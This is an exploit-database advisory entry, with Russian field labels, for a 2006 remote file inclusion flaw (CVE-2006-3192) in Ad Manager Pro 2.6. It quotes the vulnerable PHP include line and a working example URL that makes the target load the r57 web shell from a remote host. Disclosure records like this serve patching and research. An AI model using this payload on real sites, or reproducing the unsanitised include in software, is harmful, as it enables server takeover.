Exploit Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion

[Exploiter]

EDB-ID

1923

Проверка EDB

1. Пройдено

Автор

BASTI

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2006-3192

Дата публикации

2006-06-17

Ad Manager Pro 2.6 Remote File Include Vulnerability

homepage: phpwebscripts.com

Affected files: ad.php and common.php

Credit: Basti

Vulnerable Code:
if ($ipath) include($ipath.'/common.php'); else include('./common.php');

Example:
http://[site]/admanagerpro/common.php?ipath=http://site/r57.txt?

# milw0rm.com [2006-06-17]